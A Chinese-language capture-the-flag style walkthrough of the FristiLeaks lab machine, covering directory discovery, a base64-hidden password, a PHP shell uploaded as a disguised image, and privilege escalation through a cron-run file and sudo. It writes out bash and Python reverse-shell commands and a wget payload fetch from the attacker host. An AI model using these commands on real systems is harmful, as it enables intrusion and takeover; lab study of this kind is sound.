端口扫描
目录泄露 :/cola /sisi /beer
dirb目录扫描
整合下思路:
发现五张图片,将他们下载到本地分析一下
发现可疑文字CDEFGHIJSTUVWXYZcdefghijstuvwxyz
发现图片上有“this is not url”
其他无发现,搜索网页也无新发现
目录拼接泄露
网页上写着keep.calm,drink,fristi四个字母,又发现拆解文字fristi+leaks,leaks意为泄露,故觉得fristi可能是子目录
成功访问
登录框之账户密码泄露
尝试万能密码,sql注入均无果,查看源代码,发现一个信封
发信人为eezeepz
在源代码底部又发现一段注释代码,猜测为base64加密,保存下来,解密
vim base.txt
base64 -d base.txt >base1.txt
cat base1.txt
发现其为png格式,重新解码
vim base.png
base64 -d base.png >base1.png
cat base1.png
在浏览器中查看
字母为keKkeKKeKKeKkEkkEk,猜测为密码,尝试登录
登录成功
上传文件漏洞之getshell
只允许上传png,jpg,gif 类型,如果我们要上传php,就只能绕过。前端绕过不行,只能绕过。服务器经测试,存在Apache HTTPD多后缀解析漏洞
上传shell.php.jpg文件,内容为
上传后给出路径,直接访问http://192.168.213.170/fristi/uploads/shell5.php.jpg 可以直接访问,蚁剑连接,反弹shell
/bin/bash -i >& /dev/tcp/192.168.213.154/88880>&1
美化终端
python -c 'import pty;pty.spawn("/bin/bash")'
也可以不用蚁剑,直接在浏览器中执行
cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.213.154",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
解释:
这是一个用于建立反向 shell 的简单 Python 脚本。它通过重定向标准输入、输出和错误,以及启动一个交互式 shell,实现了远程控制目标机器的功能。
提权
内核信息不多,无法利用内核漏洞提权
在根目录下发现notes.txt文件,有这样一段话
hey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. 那我们去访问该目录,用户eezeepz
下面也有notes.txt,
提示:只需要在/tmp/目录下放一个名为“runthis”的文件,每行一个命令。输出到/tmp/目录下的“cronresult”文件。它应该以我的帐户权限每分钟运行一次
猜测其跟定时任务一样,我们可以继续反弹shell
wget http://192.168.213.154:4444/shell3.py
echo '/usr/bin/python /tmp/shell3.py' > runthis
kali:
nc -lvvp 4444
成功反弹admin用户
查看当前目录下文件
两个加密的数据
mVGZ3O3omkJLmy2pcuTq
=RFn0AKnlMHMPIzpyuTI0ITG
一个加密的文件,一个定时任务文件
我们编写解密文件
import base64, codecs, sys
def decodeString(encoded_str):
try:
return base64.b64decode(codecs.decode(encoded_str, 'rot13')[::-1]).decode('utf-8')
except:
return None
if __name__ == "__main__":
if len(sys.argv) == 2:
print(decodeString(sys.argv[1]))
分别解密
thisisalsopw123 LetThereBeFristi!
我们可以用密码 LetThereBeFristi!登上用户fristigod
查看历史 history
有历史提权命令
那么就可以构造一个开启root权限的shell终端的命令
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
成功获取flag
原文始发于微信公众号(泷羽Sec-山然):Fristileaks 靶机,文件上传之getshell,sudo提权
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论